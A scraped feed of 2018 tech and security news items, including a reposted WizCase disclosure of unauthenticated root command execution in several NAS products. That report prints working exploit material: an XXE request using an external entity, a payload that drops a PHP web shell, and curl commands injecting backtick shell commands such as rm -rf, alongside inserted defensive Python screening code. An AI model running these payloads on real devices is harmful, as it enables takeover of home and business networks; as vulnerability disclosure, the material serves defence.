News & Updates

The Centers for Medicare and Medicaid Services announced that hackers breached a computer system that interacts with HealthCare.gov.

Hackers breached a computer system that interacts with HealthCare.gov; according to the Centers for Medicare and Medicaid Services, the attackers accessed the sensitive personal data of some 75,000 people.

After experts discovered the intrusion, the system was shut down, and IT staff are working to restore operation.

“Officials said the hacked system was shut down and technicians are working to restore it before sign-up season starts Nov. 1 for health care coverage under the Affordable Care Act.” reported the Associated Press.

“The system that was hacked is used by insurance agents and brokers to directly enroll customers. All other sign-up systems are working.”

In the US, Barack Obama’s health care law secured private coverage for about 10 million people who, in order to access the public service, have to provide extensive personal information, including Social Security numbers, income, and citizenship or legal immigration status.

Starting November 1, people can log in to HealthCare.gov, fill out an application, and enroll in a 2019 Marketplace health plan.


A spokesman for the Centers for Medicare and Medicaid declared that “nothing happened” to the HealthCare.gov website that is used by the general public.

“This concerns the agent and broker portal, which is not accessible to the general public,” he said.

Law enforcement is investigating the incident, and affected customers have been notified and will receive free credit protection.

The post Hackers breached into system that interacts with HealthCare.gov appeared first on Security Affairs.

Source: Security affairs

Timeworn headstones in Donegal Cemetery. Here lies an expert (maybe). (credit: Nicolas Raymond / Flickr)

There is a Climate Science Legal Defense Fund. Take a moment to consider the implications of that fact. The inhabitants of what, under other circumstances, would be an obscure academic backwater need legal defense. Non-scientists have convinced themselves so thoroughly that these experts have to be wrong that they claim the whole field is swimming in fraud and have engaged in legal assaults to try to confirm their beliefs. The scientists need legal defense because their opponents are convinced they can provide evidence of the fraud—if only they could see every email the scientists have ever sent.

Climate scientists may suffer from an extreme example of this sort of vilification, but they’re hardly alone. The US has had a long history of mistrust in highly educated professionals, but we seem to have shifted to a situation in which expertise has become both a disqualification and a reason for attack.

That’s the central argument of Tom Nichols’ recent book, The Death of Expertise, which has recently come out in a paperback edition. Nichols is a professor at the Naval War College and an expert himself, having done graduate studies about the former Soviet Union. While he’s gained some prominence as a never-Trump conservative, the arguments in his book are evenhanded at distributing blame. And they make disturbing reading for anyone in science who’s interested in engaging the public—especially in the science arena.


Source: http://feeds.arstechnica.com/arstechnica/index/

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Ex-NASA contractor pleaded guilty for cyberstalking crimes
·      Expert released PoC Code Microsoft Edge Remote Code Execution flaw
·      Microsoft fixed the Zero-Day for JET flaw, but the fix is incomplete
·      A Russian cyber vigilante is patching outdated MikroTik routers exposed online
·      Branch.io Flaws may have affected as many as 685 million individuals
·      Online market for counterfeit goods in Russia has reached $1,5 billion
·      Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies
·      35 million US voter records available for sale in a hacking forum
·      A simple message containing certain symbols could crash the Sony PlayStation 4
·      Expert disclosed a new passcode bypass to access photos and contacts on a locked iPhone
·      How Cybercriminals are Targeting free Wi-Fi Users?
·      Russia-linked APT group DustSquad targets diplomatic entities in Central Asia
·      A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence
·      Brazil expert discovers Oracle flaw that allows massive DDoS attacks
·      MartyMcFly Malware: new Cyber-Espionage Campaign targeting Italian Naval Industry
·      Thousands of servers easy to hack due to a LibSSH Flaw
·      VMware addressed Code Execution Flaw in its ESXi, Workstation, and Fusion products
·      Chaining three critical vulnerabilities allows takeover of D-Link routers
·      GreyEnergy cyberespionage group targets Poland and Ukraine
·      Group-IB: 14 cyber attacks on crypto exchanges resulted in a loss of $882 million
·      The author of the LuminosityLink RAT sentenced to 30 Months in Prison
·      Attackers behind Operation Oceansalt reuse code from Chinese Comment Crew
·      Drupal dev team fixed Remote Code Execution flaws in the popular CMS
·      Splunk addressed several vulnerabilities in Enterprise and Light products
·      Syrian victims of the GandCrab ransomware can decrypt their files for free
·      Thousands of applications affected by a zero-day issue in jQuery File Upload plugin

 


Pierluigi Paganini

(Security Affairs – Newsletter)


The post Security Affairs newsletter Round 185 – News of the week appeared first on Security Affairs.

Source: Security affairs

Security researchers from WizCase have discovered several vulnerabilities in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS.

NAS devices have become the storage device of choice for many small and medium businesses (SMBs). They are inexpensive, easy to operate, and you can add storage if you’re running low on space. But are they secure enough to protect your company’s data? That was the question on our minds when we brought in security researchers Paulos Yibelo and Daniel Eshetu to see if they could exploit any vulnerabilities in the leading NAS devices.

We focused on discovering only critical vulnerabilities that can be exploited remotely without any user interaction, meaning that authentication bypasses weren’t enough: we wanted to execute commands on the devices remotely with the highest privileges. We were successful on all of the devices.

Summary of Our Findings

We used four popular NAS devices for this project:

  1. WD My Book
  2. NetGear Stora
  3. SeaGate Home
  4. Medion LifeCloud NAS

We successfully gained remote root command execution on the devices, and therefore on the networks they are on, simply by knowing their IP addresses.

  • All four NAS devices tested suffer from zero-day unauthenticated root remote command execution (pre-auth RCE) vulnerabilities.
  • The vulnerabilities allow hackers, governments, or anyone with malicious intent to read files, add/remove users, add/modify existing data, or execute commands with the highest privileges on all of the devices.
  • It is our belief that many other NAS devices suffer from similar vulnerabilities, as there seems to be a pattern of missing security measures that should be expected of NAS devices.
  • Both vulnerabilities (assigned CVE-2018-18472 and CVE-2018-18471) remain unpatched at the time of this publication.
  • There are nearly 2 million affected devices online.

CVE-2018-18471 – XXE and Unauthenticated Remote Command Execution in Axentra Hipserv NAS firmware

Axentra Hipserv is a NAS OS that runs on multiple devices and provides cloud-based login, file storage and management functionality. It is used in devices from several vendors; the affected devices sharing the firmware are:

  • Netgear Stora
  • Seagate GoFlex Home
  • Medion LifeCloud (maybe more).

The company provides firmware with a web interface that mainly uses PHP as its server-side language. The web interface has a REST API endpoint and a typical web management interface with file manager support.

Firmware Analysis.

After extracting the firmware and decoding the files, the PHP files were located in /var/www/html/ with the webroot in /var/www/html/html. The main handler for the web interface is homebase.php, and RESTAPIController.php is the main handler for the REST API. All the PHP files were encrypted using ionCube, which has a known public decoder, and since the version used was an old one, decoding the files didn’t take long.

Part One: XXE

After decoding the files, we found that most of the API endpoints and the web interface were not accessible without authentication. One of the few exceptions was a handful of endpoints in the REST API. One of those endpoints, located at /api/2.0/rest/aggregator/xml, loads XML from the POST data; it uses DOMDocument for loading (parsing) the XML, which ordinarily should not be vulnerable to XXE attacks.

However, the version of libxml2 used as a backend in the firmware is an old one, which means that external entity loading was not disabled by default; this opened the endpoint to exploitation. Through it, it was possible to read files and perform SSRF attacks. An example request is given below.

POST /api/2.0/rest/aggregator/xml HTTP/1.1
Host: 192.168.10.21
User-Agent: GoogleBot/2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
Cookie: HOMEBASEID=c4be432f8add72db591aaa72c0fbbd34
Connection: close
Upgrade-Insecure-Requests: 1

<?xml version="1.0"?>
<!DOCTYPE requests [
<!ELEMENT request (#PCDATA)>
<!ENTITY % dtd SYSTEM "http://192.168.10.20/XXE_CHECK">
%dtd;
]>
<requests>
<request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request>
</requests>

The above request caused the XML parser to make a request to our server at 192.168.56.1 for the file XXE_CHECK. Although the file read was useful for grabbing some sensitive files, XML can’t carry binary data, so it was not possible to dump the SQLite database to get usernames and passwords.

That meant we were able to read files and make SSRF requests from any of the devices below:

  • Netgear Stora
  • Seagate GoFlex Home
  • Medion LifeCloud
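The aggregator endpoint described above accepts XML from an unauthenticated caller and hands it to a parser whose entity handling depends on the libxml2 build underneath. The following Python is an added example, not code from the WizCase report or from the Hipserv firmware: it screens the raw request body for a DOCTYPE or an external (SYSTEM/PUBLIC) entity declaration before any parser sees it, then parses the legitimate aggregator format and returns the sub-requests it asks for. The two request bodies are constructed samples; the first reproduces the structure of the report's request with its external parameter entity, the second is the same request without a DTD.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the structure of the report's request to
# /api/2.0/rest/aggregator/xml, including the external parameter entity that
# an old libxml2 would resolve by fetching the remote DTD.
XXE_BODY = b"""<?xml version="1.0"?>
<!DOCTYPE requests [
<!ELEMENT request (#PCDATA)>
<!ENTITY % dtd SYSTEM "http://192.168.10.20/XXE_CHECK">
%dtd;
]>
<requests>
<request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request>
</requests>
"""

# Constructed sample: the same request with no DTD, which is all the
# aggregator format needs to work.
CLEAN_BODY = b"""<?xml version="1.0"?>
<requests>
<request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request>
<request href="/api/2.0/rest/status/" method="GET"></request>
</requests>
"""

# An external identifier (SYSTEM or PUBLIC) on a general or parameter entity
# is the exact construct behind file reads and SSRF through the parser.
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s*)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


class UnsafeXML(ValueError):
    """Raised when a request body is refused before parsing."""


def screen_xml(body: bytes) -> None:
    """Refuse any body that carries a DTD. Deciding on the raw bytes first means
    the outcome does not depend on how the parser behind the endpoint treats
    entities, which is the knob that varied between libxml2 versions."""
    if EXTERNAL_ENTITY_RE.search(body):
        raise UnsafeXML("external entity declaration in request body")
    if DOCTYPE_RE.search(body):
        raise UnsafeXML("DOCTYPE is not permitted in this request")


def parse_aggregator_request(body: bytes) -> list:
    """Return the (href, method) pairs a well-formed aggregator request asks for."""
    screen_xml(body)
    root = ET.fromstring(body)
    if root.tag != "requests":
        raise UnsafeXML("unexpected root element %r" % root.tag)
    return [(req.get("href"), req.get("method")) for req in root.findall("request")]


def is_accepted(body: bytes) -> bool:
    """True if the body passes screening and parses, False if it is refused."""
    try:
        parse_aggregator_request(body)
        return True
    except (UnsafeXML, ET.ParseError):
        return False


if __name__ == "__main__":
    print("clean request:", parse_aggregator_request(CLEAN_BODY))
    print("xxe request accepted?", is_accepted(XXE_BODY))
```

Refusing every DOCTYPE is the right policy for a format that never needs one. In PHP the corresponding hardening is to pass LIBXML_NONET to DOMDocument::loadXML, to call libxml_disable_entity_loader(true) on PHP versions before 8.0, and to reject any document whose $dom->doctype is not null.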

Part Two: RCE

Looking at how the web interface (the REST API in particular) performed root actions was the next step. Since the web server runs as a non-root user with no sudo rights, we looked further and found that the REST API makes calls to a local daemon named oe-spd, which runs on port 2000 bound to 127.0.0.1.

The daemon takes XML data, parses the request and carries out the action without any authentication beyond checking that the request came from 127.0.0.1. What’s more, the daemon skips over junk data until it finds the string <?xml version="1.0"?>, as shown in the IDA snippet below.

strstr(*input_data, "<?xml version=\"1.0\"?>");

This made things a lot easier: since the request is going to be sent over HTTP, having the daemon skip what it considers junk data was a real help. But since we can’t put the daemon’s URL directly in the XML file, we make the XML parser send a request to a PHP script (or anything that does the redirection, really) that redirects it to http://127.0.0.1:2000/a.php?d=*payload here*.

Since the daemon is chock-full of command execution bugs, it was easy to craft a request that triggered one. Additionally, since the daemon runs with root privileges, it is possible to perform any action on the device. An example payload is given below.

* This payload uploads a simple PHP shell to /var/www/html/html/u.php (<device-ip>/u.php?cmd=id).

<?xml version="1.0"?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name="disk">a`echo PD9waHAKZWNobyAnPHByZT4nOwpzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKZWNobyAnPC9wcmU+JzsKPz4K | base64 -d >/var/www/html/html/u.php`</parameter></proxy_request>

Putting it all together.

To chain the vulnerabilities seamlessly we need a server the device can make an outbound connection to, and the following simple PHP script to redirect the parser, send the payload and handle a little multi-staging of payloads.

CVE-2018-18472 – WD MyBook Live Unauthenticated Remote Command Execution

WD MyBook Live and some models of WD MyCloud NAS contain a remotely exploitable vulnerability that lets anyone run commands on the device as root. The vulnerability lies in the language change-and-modify functionality of the REST API; the following PoC demonstrates the flaw.

PoC:

curl -kX PUT -d 'language=en_US`<linux command here>`' https://<NAS_IP>/api/1.0/rest/language_configuration

Examples:

curl -kX PUT -d 'language=en_US`id > /var/www/id.txt`' https://<NAS_IP>/api/1.0/rest/language_configuration

The PoC will create an id.txt file in the webroot containing the output of the id command. The file can be removed using the following PoC:

curl -kX PUT -d 'language=en_US`rm -rf /var/www/id.txt`' https://<NAS_IP>/api/1.0/rest/language_configuration
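Both command injections in this report have the same shape: a request parameter (the disk name handed to oe-spd, the language value sent to language_configuration) is spliced into a shell command, so a backtick in the value becomes a command. The following Python is an added example, not code from the report or from either vendor's firmware, and it goes slightly beyond the page by treating both parameters with one rule: each named parameter is matched in full against a strict allowlist, and the privileged action is built as an argv list so that no shell ever sees the value. The parameter names and the XML and form shapes come from the page; the disk-name rule, the command paths (/usr/bin/set-locale, /usr/bin/eject) and the sample values (sda1, a`id`) are constructed assumptions. The shell-metacharacter check is only a secondary signal for labelling rejected requests in logs, not a substitute for the allowlist.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Allowlist per parameter name. Constructed rules: a locale tag such as en_US,
# and a short lowercase device name such as sda1. Anything else is refused.
ALLOWED = {
    "language": re.compile(r"[a-z]{2}_[A-Z]{2}"),
    "disk": re.compile(r"[a-z][a-z0-9]{0,15}"),
}

# Shell metacharacters that have no place in either parameter; used only to
# label a rejected request as a probable injection attempt.
SHELL_META_RE = re.compile(r"[`;|&<>\n]|\$\(")


class InvalidParameter(ValueError):
    """Raised for any parameter value that fails its allowlist."""


def looks_like_injection(value: str) -> bool:
    return bool(SHELL_META_RE.search(value))


def validate(name: str, value: str) -> str:
    """Return value unchanged if it fully matches the allowlist for name."""
    pattern = ALLOWED.get(name)
    if pattern is None:
        raise InvalidParameter("unknown parameter %r" % name)
    if not pattern.fullmatch(value):
        reason = "probable injection" if looks_like_injection(value) else "malformed"
        raise InvalidParameter("%s=%r rejected (%s)" % (name, value, reason))
    return value


def language_argv(form_body: str) -> list:
    """Form-encoded body of a PUT to /api/1.0/rest/language_configuration.
    Returns the argv that would apply the locale; the caller passes it to
    subprocess.run(argv) with shell=False, so no metacharacter is interpreted."""
    fields = parse_qs(form_body, strict_parsing=True)
    values = fields.get("language", [])
    if len(values) != 1:
        raise InvalidParameter("exactly one language value is required")
    locale = validate("language", values[0])
    # Hypothetical command path standing in for whatever the firmware runs.
    return ["/usr/bin/set-locale", locale]


def eject_argv(xml_body: str) -> list:
    """XML proxy_request body as sent to the oe-spd daemon on 127.0.0.1:2000.
    Returns the argv for the eject action; again a list, never a shell string."""
    root = ET.fromstring(xml_body)
    if root.tag != "proxy_request":
        raise InvalidParameter("unexpected root element %r" % root.tag)
    action = (root.findtext("command_name"), root.findtext("operation_name"))
    if action != ("usb", "eject"):
        raise InvalidParameter("unsupported action %r" % (action,))
    disk = None
    for param in root.findall("parameter"):
        if param.get("parameter_name") == "disk":
            disk = validate("disk", param.text or "")
    if disk is None:
        raise InvalidParameter("disk parameter missing")
    return ["/usr/bin/eject", "/dev/" + disk]  # hypothetical command path


def accepted(handler, body: str) -> bool:
    """True if handler builds an argv for body, False if the body is refused."""
    try:
        handler(body)
        return True
    except (ValueError, ET.ParseError):  # InvalidParameter is a ValueError
        return False


# Constructed samples. The benign ones are what the endpoints legitimately
# receive; the hostile ones carry a backtick command in the parameter value,
# the same shape as the PoCs quoted in the report.
LANGUAGE_OK = "language=en_US"
LANGUAGE_BAD = "language=en_US`id > /var/www/id.txt`"
PROXY_TEMPLATE = (
    '<?xml version="1.0"?><proxy_request><command_name>usb</command_name>'
    '<operation_name>eject</operation_name>'
    '<parameter parameter_name="disk">%s</parameter></proxy_request>'
)
EJECT_OK = PROXY_TEMPLATE % "sda1"
EJECT_BAD = PROXY_TEMPLATE % "a`id`"

if __name__ == "__main__":
    for handler, body in ((language_argv, LANGUAGE_OK), (language_argv, LANGUAGE_BAD),
                          (eject_argv, EJECT_OK), (eject_argv, EJECT_BAD)):
        print("accepted" if accepted(handler, body) else "rejected", repr(body))
```

The allowlist does the real work: a value that is exactly two lowercase letters, an underscore and two uppercase letters cannot contain a backtick, so the argv it produces is safe even before the shell is taken out of the path. Building the command as a list removes the shell entirely, which also covers metacharacters the regex above does not list.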

What does this mean to the affected NAS users?

  • If you are using one of the above devices and it is connected to the WAN, make sure to remove the device from the internet (keep it running only locally, in a safe network).
  • Make sure to contact the affected vendors and insist they release a patch as soon as possible!
  • We will update this article as a patch becomes available.
  • We also recommend you use a VPN to protect your computers and mobile devices from hackers. ExpressVPN and NordVPN both use AES 256-bit encryption and will secure all your data. (This won’t protect from a NAS attack, but it will protect you from other cyber attacks.)

The original report is available here.

WizCase Report: Vulnerabilities found on WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS

Responses

WD:

The vulnerability report CVE-2018-18472 affects My Book Live devices originally introduced to the market between 2010 and 2012. These products have been discontinued since 2014 and are no longer covered under our device software support lifecycle. We encourage users who wish to continue operating these legacy products to configure their firewall to prevent remote access to these devices and to take measures to ensure that only trusted devices on the local network have access to the device.

Western Digital takes the security of our customers’ data seriously, and we provide security updates for our products to address issues from both external reports and regular security audits. Additionally, we welcome the opportunity to work with members of the security research community through responsible disclosure to help protect our users. Users who wish to find the latest security update for their Western Digital device may do so on our support portal at https://support.wdc.com. Security researchers who wish to contact Western Digital can find contact information as well as a PGP key at https://www.wdc.com/security/reporting.html.

 

About the authors:

WizCase Research Team 

Paulos Yibelo is a reputable security researcher who uncovered multiple security issues and leaks affecting major VPN providers last year, with a number of severe IoT CVEs to his name.

Daniel Eshetu is an underground security researcher who has previously made his mark in NAS and IoT exploit development.

The post WizCase Report: Vulnerabilities found in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS appeared first on Security Affairs.

Source: Security affairs

One of the hacked websites, wifelovers.com, as it appeared on October 12. (credit: Internet Archive)

A recent hack of eight poorly secured adult websites has exposed megabytes of personal data that could be damaging to the people who shared pictures and other highly intimate information on the online message boards. Included in the leaked file are (1) IP addresses that connected to the sites, (2) user passwords protected by a four-decade-old cryptographic scheme, (3) names, and (4) 1.2 million unique email addresses, although it’s not clear how many of the addresses legitimately belonged to actual users.

Robert Angelini, the owner of wifelovers.com and the seven other breached sites, told Ars on Saturday morning that, in the 21 years they operated, fewer than 107,000 people posted to them. He said he didn’t know how or why the almost 98-megabyte file contained more than 12 times that many email addresses, and he hasn’t had time to examine a copy of the database that he received on Friday night.

Still, three days after receiving notification of the hack, Angelini finally confirmed the breach and took down the sites on early Saturday morning. A notice on the just-shuttered sites warns users to change passwords on other sites, especially if they match the passwords used on the hacked sites.


Source: http://feeds.arstechnica.com/arstechnica/index/

By Waqas

An IT security researcher at Cisco Talos Intelligence Group has discovered a critical remote code execution vulnerability in the LIVE555 media streaming library used by popular media players such as VLC and MPlayer. Maintained by the company Live Networks, the library works with the RTP/RTCP, RTSP and SIP protocols, with the ability to process […]

This is a post from HackRead.com. Read the original post: Watch out: MPlayer and VLC media player hit by critical vulnerability

Source: https://www.hackread.com/feed/

The developers of the GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

The authors of the infamous GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

GandCrab developers’ post on the underground forum (Source: Bleeping Computer)

The crooks decided to release the decryption keys after a Syrian Twitter user published a harrowing message asking for help after photos of his deceased children were encrypted by the ransomware.

The GandCrab developers explained that it was not their intention to infect Syrian users; their message on the hacking forum includes a link to a zip file containing the decryption keys for Syrian victims.

“This zip file contains the readme.txt in Russian language and SY_keys.txt files.  The readme.txt file contains information on how the key file is organized and information on why the keys were released.” states Bleeping Computer.

“The most important thing is not to indicate that he will help everyone. It will help only a citizen of Syria. Because of their political situation, economic and relations with the CIS countries. We regret that we did not initially add this country to the exceptions. But at least that way we can help them now.” reads the message from the author of the ransomware.

The SY_keys.txt file includes a list of 978 decryption keys for Syrian victims whose systems have been infected with GandCrab version 1.0 through 5.0.

Syrian victims not included in the file could receive their decryption keys by providing the GandCrab developers with a picture of themselves, their passport, and their payment page. Providing crooks with pictures of a passport is very risky: such documents could be resold by the crooks or used by them for identity theft.

Experts believe that security firms will develop a decryption tool based on the released keys.


Pierluigi Paganini

(Security Affairs – GandCrab ransomware, cybercrime)


The post Syrian victims of the GandCrab ransomware can decrypt their files for free appeared first on Security Affairs.

Source: Security affairs

Windows 10 during a product launch event in Tokyo in July 2015. (credit: Kiyoshi Ota/Bloomberg via Getty Images)

It’s fair to say that the Windows 10 October 2018 Update has not been Microsoft’s most successful update. Reports of data loss quickly emerged, forcing Microsoft to suspend distribution of the update. It has since been fixed and is currently undergoing renewed testing pending a re-release.

This isn’t the first Windows feature update that’s had problems—we’ve seen things like significant hardware incompatibilities in previous updates—but it’s certainly the worst. While most of us know the theory of having backups, the reality is that lots of data, especially on home PCs, has no real backup, and deleting that data is thus disastrous.

Windows as a service

Microsoft’s ambition with Windows 10 was to radically shake up how it develops Windows 10. The company wanted to better respond to customer and market needs, and to put improved new features into customers’ hands sooner. Core to this was the notion that Windows 10 is the “last” version of Windows—all new development work will be an update to Windows 10, delivered through feature updates several times a year. This new development model was branded “Windows as a Service.” And after some initial fumbling, Microsoft settled on a cadence of two feature updates a year; one in April, one in October.


Source: http://feeds.arstechnica.com/arstechnica/index/

The Cambodian city of Angkor was once the largest in the world until vast swathes of the population decamped in the 15th century. Its famous temple, Angkor Wat (above), survived. (credit: Stefan Irvine/LightRocket/Getty Images)

The Cambodian city of Angkor was once the largest in the world… then the vast majority of its inhabitants suddenly decamped in the 15th century to a region near the modern city of Phnom Penh. Historians have put forth several theories about why this mass exodus occurred. A new paper in Science Advances argues that one major contributing factor was an overloaded water distribution system, exacerbated by extreme swings in the climate.

Angkor dates back to around 802 CE. Its vast network of canals, moats, embankments, and reservoirs developed over the next 600 years, helping distribute vital water resources for such uses as irrigation and to help control occasional flooding. By the end of the 11th century, the system bore all the features of a complex network, with thousands of interconnected individual components heavily dependent on each other.

Such a configuration, hovering at or near the so-called critical point, is ideal for the effective flow of resources, whether we’re talking about water, electricity (power grids), traffic, the spread of disease, or information (the stock market and the Internet). The tradeoff is that it can become much more sensitive to even tiny perturbations—so much so that a small outage in one part of the network can trigger a sudden network-wide cascading failure.


Source: http://feeds.arstechnica.com/arstechnica/index/

Review: Istanbul: The Dice Game rules the bazaar

(Image credit: Nate Anderson)

Welcome to Ars Cardboard, our weekend look at tabletop games! Check out our complete board gaming coverage at cardboard.arstechnica.com.

When it comes to gaming, I am a man of simple pleasures. I need no boxes of sculpted minis, no hour-long setup, no manuals the size of novels. Let me chuck huge handfuls of dice, collect colorful goods, earn chunky gems, and I am content. Wrap the whole package in elegant artwork with a clear ruleset and a low price, and I am ready to play, anytime, anywhere.

That’s why I love Istanbul: The Dice Game, the (inevitable) dice-driven implementation of 2014’s award-winning board game, Istanbul. In that earlier big-box game, players moved their “merchants” around the “bazaar” to collect and trade goods, or to gamble in the tea shop, or to spring a relative from jail and send him on an errand for you. (Don’t ask.) The goal was to collect enough shiny acrylic rubies to retire rich.


Source: http://feeds.arstechnica.com/arstechnica/index/